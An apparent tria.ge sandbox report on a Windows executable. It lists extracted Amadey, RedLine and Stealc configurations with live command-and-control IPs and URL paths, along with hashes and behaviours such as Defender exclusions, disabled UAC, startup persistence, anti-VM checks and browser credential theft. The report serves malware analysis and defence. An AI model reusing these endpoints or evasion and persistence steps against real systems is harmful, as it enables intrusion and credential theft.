Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows11-21h2_x64 -
resource
win11-20240802-en -
resource tags
arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system -
submitted
07/08/2024, 09:09
Static task
static1
Behavioral task
behavioral1
Sample
60a0bf469a1dbe408434a2fbe9b7b2cfb0ee06160a180e543e45cc8e982ff107.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral2
Sample
60a0bf469a1dbe408434a2fbe9b7b2cfb0ee06160a180e543e45cc8e982ff107.exe
Resource
win11-20240802-en
General
-
Target
60a0bf469a1dbe408434a2fbe9b7b2cfb0ee06160a180e543e45cc8e982ff107.exe
-
Size
1.8MB
-
MD5
ee8904b675f96658c010ec91c94102c6
-
SHA1
1838a28a91645768f1b186ef05ad797dd29fda12
-
SHA256
60a0bf469a1dbe408434a2fbe9b7b2cfb0ee06160a180e543e45cc8e982ff107
-
SHA512
1a6ec563191939662fafd46a976c694a6881c402d2c8c1103e50dfa093f6c40cb136cd0578b5a7b355c62efe50603bbe4128e801f5566451353a31ca25bde336
-
SSDEEP
49152:VDaanUYEobclzT0wAAS5JKtLQpXbfMoAOeTmBxa10:hUYEOQzkAEYLeXL+OegM0
Malware Config
Extracted
amadey
4.41
fed3aa
http://185.215.113.16
-
install_dir
44111dbc49
-
install_file
axplong.exe
-
strings_key
8d0ad6945b1a30a186ec2d30be6db0b5
-
url_paths
/Jo89Ku7d/index.php
Extracted
redline
LiveTraffic
20.52.165.210:39030
Extracted
redline
185.215.113.67:21405
Extracted
stealc
default
http://185.215.113.17
-
url_path
/2fb6c2cc8dce150a.php
Extracted
redline
BUY TG @FATHEROFCARDERS
45.66.231.214:9932
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 5 IoCs
resource yara_rule behavioral2/memory/2940-37-0x0000000000400000-0x0000000000452000-memory.dmp family_redline behavioral2/files/0x000100000002a97c-91.dat family_redline behavioral2/memory/2868-110-0x0000000000110000-0x0000000000162000-memory.dmp family_redline behavioral2/files/0x000100000002a996-236.dat family_redline behavioral2/memory/1428-251-0x00000000005D0000-0x0000000000622000-memory.dmp family_redline -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" FILE2233.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths FILE2233.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000069001\FILE2233.exe = "0" FILE2233.exe -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 60a0bf469a1dbe408434a2fbe9b7b2cfb0ee06160a180e543e45cc8e982ff107.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 67 4224 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1408 powershell.exe 2908 powershell.exe 4752 powershell.EXE 2084 powershell.exe 2188 powershell.exe 4892 powershell.exe 1360 powershell.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 10 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 60a0bf469a1dbe408434a2fbe9b7b2cfb0ee06160a180e543e45cc8e982ff107.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 60a0bf469a1dbe408434a2fbe9b7b2cfb0ee06160a180e543e45cc8e982ff107.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3761892313-3378554128-2287991803-1000\Control Panel\International\Geo\Nation fKyKrYk.exe -
Drops startup file 3 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UR6UVtITwUngMrJfLVohmFva.bat jsc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VPyDVwFZzQWLSxOv05XZBkfb.bat jsc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bn8s93fzFaxqnbV5ntiaqTQx.bat jsc.exe -
Executes dropped EXE 21 IoCs
pid Process 4836 axplong.exe 424 GOLD.exe 3300 crypteda.exe 2944 newalp.exe 3032 Hkbsse.exe 2868 06082025.exe 2116 h9XoUFzLUU.exe 3848 0zwMQZV3j5.exe 5084 stealc_default.exe 4276 FILE2233.exe 1428 MYNEWRDX.exe 2856 GuTcEcCNFDfRxn4taTkm5Qp2.exe 508 Install.exe 4100 Install.exe 3040 8NYxJZjsZmkPKrv00HfCzotx.exe 1668 axplong.exe 4812 Hkbsse.exe 960 Install.exe 3576 fKyKrYk.exe 3404 axplong.exe 1672 Hkbsse.exe -
Identifies Wine through registry keys 2 TTPs 4 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3761892313-3378554128-2287991803-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-3761892313-3378554128-2287991803-1000\Software\Wine 60a0bf469a1dbe408434a2fbe9b7b2cfb0ee06160a180e543e45cc8e982ff107.exe Key opened \REGISTRY\USER\S-1-5-21-3761892313-3378554128-2287991803-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-3761892313-3378554128-2287991803-1000\Software\Wine axplong.exe -
Indirect Command Execution 1 TTPs 17 IoCs
Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.
pid Process 960 forfiles.exe 2324 forfiles.exe 2960 forfiles.exe 3016 forfiles.exe 2364 forfiles.exe 4800 forfiles.exe 4584 forfiles.exe 4348 forfiles.exe 3588 forfiles.exe 3336 forfiles.exe 4264 forfiles.exe 4972 forfiles.exe 1080 forfiles.exe 4864 forfiles.exe 4600 forfiles.exe 2252 forfiles.exe 1136 forfiles.exe -
Loads dropped DLL 3 IoCs
pid Process 5084 stealc_default.exe 5084 stealc_default.exe 4224 rundll32.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths FILE2233.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions FILE2233.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000069001\FILE2233.exe = "0" FILE2233.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA FILE2233.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" FILE2233.exe -
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json fKyKrYk.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json fKyKrYk.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini Install.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
flow ioc 2 raw.githubusercontent.com 15 raw.githubusercontent.com 17 pastebin.com 23 pastebin.com 29 raw.githubusercontent.com -
Drops file in System32 directory 31 IoCs
description ioc Process File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft fKyKrYk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData fKyKrYk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content fKyKrYk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache fKyKrYk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA fKyKrYk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 fKyKrYk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_5CF45833F44BFC2995315451A3896ACA fKyKrYk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_68D058512F3515153DEB95A1F4E72552 fKyKrYk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 fKyKrYk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 fKyKrYk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\54E176903A096E58E807B60E1BDFA85C fKyKrYk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C02877841121CC45139CB51404116B25_9CE832D646FBAFC5C4ACFC523FDD84AD fKyKrYk.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE fKyKrYk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 fKyKrYk.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol fKyKrYk.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\54E176903A096E58E807B60E1BDFA85C fKyKrYk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA fKyKrYk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_5CF45833F44BFC2995315451A3896ACA fKyKrYk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C02877841121CC45139CB51404116B25_9CE832D646FBAFC5C4ACFC523FDD84AD fKyKrYk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies fKyKrYk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 fKyKrYk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_68D058512F3515153DEB95A1F4E72552 fKyKrYk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 fKyKrYk.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 2588 60a0bf469a1dbe408434a2fbe9b7b2cfb0ee06160a180e543e45cc8e982ff107.exe 4836 axplong.exe 1668 axplong.exe 3404 axplong.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 424 set thread context of 2940 424 GOLD.exe 86 PID 3300 set thread context of 1692 3300 crypteda.exe 91 PID 4276 set thread context of 2300 4276 FILE2233.exe 104 -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files (x86)\ZTBxIWbqU\dAwlTf.dll fKyKrYk.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak fKyKrYk.exe File created C:\Program Files (x86)\ZTBxIWbqU\VNLOHtB.xml fKyKrYk.exe File created C:\Program Files (x86)\OKRdpmURQpaU2\rdtAcwvlbTlfU.dll fKyKrYk.exe File created C:\Program Files (x86)\smKXxMfqpieUC\elYVctC.dll fKyKrYk.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi fKyKrYk.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak fKyKrYk.exe File created C:\Program Files (x86)\xOBlloqpUQIzwZLwmJR\yMfLndn.xml fKyKrYk.exe File created C:\Program Files (x86)\aMBHFSbSyrUn\oKLoZCa.dll fKyKrYk.exe File created C:\Program Files (x86)\xOBlloqpUQIzwZLwmJR\ldNyzro.dll fKyKrYk.exe File created C:\Program Files (x86)\smKXxMfqpieUC\AxCSftX.xml fKyKrYk.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi fKyKrYk.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja fKyKrYk.exe File created C:\Program Files (x86)\OKRdpmURQpaU2\XVgdGQB.xml fKyKrYk.exe -
Drops file in Windows directory 6 IoCs
description ioc Process File created C:\Windows\Tasks\axplong.job 60a0bf469a1dbe408434a2fbe9b7b2cfb0ee06160a180e543e45cc8e982ff107.exe File created C:\Windows\Tasks\Hkbsse.job newalp.exe File created C:\Windows\Tasks\bdLMAcyiuofwZlrejw.job schtasks.exe File created C:\Windows\Tasks\voUEtHYOOZwJsxqeG.job schtasks.exe File created C:\Windows\Tasks\yFAmEcnxfnVDyRq.job schtasks.exe File created C:\Windows\Tasks\RNbHXMWSUrQEjcGVS.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 2684 960 WerFault.exe 142 1780 4100 WerFault.exe 111 3076 3576 WerFault.exe 233 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gpupdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 06082025.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language newalp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gpupdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gpupdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 8NYxJZjsZmkPKrv00HfCzotx.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 8NYxJZjsZmkPKrv00HfCzotx.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 stealc_default.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString stealc_default.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{85315c9a-0000-0000-0000-d01200000000}\NukeOnDelete = "0" Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ fKyKrYk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "3" Install.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing fKyKrYk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{85315c9a-0000-0000-0000-d01200000000} Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created 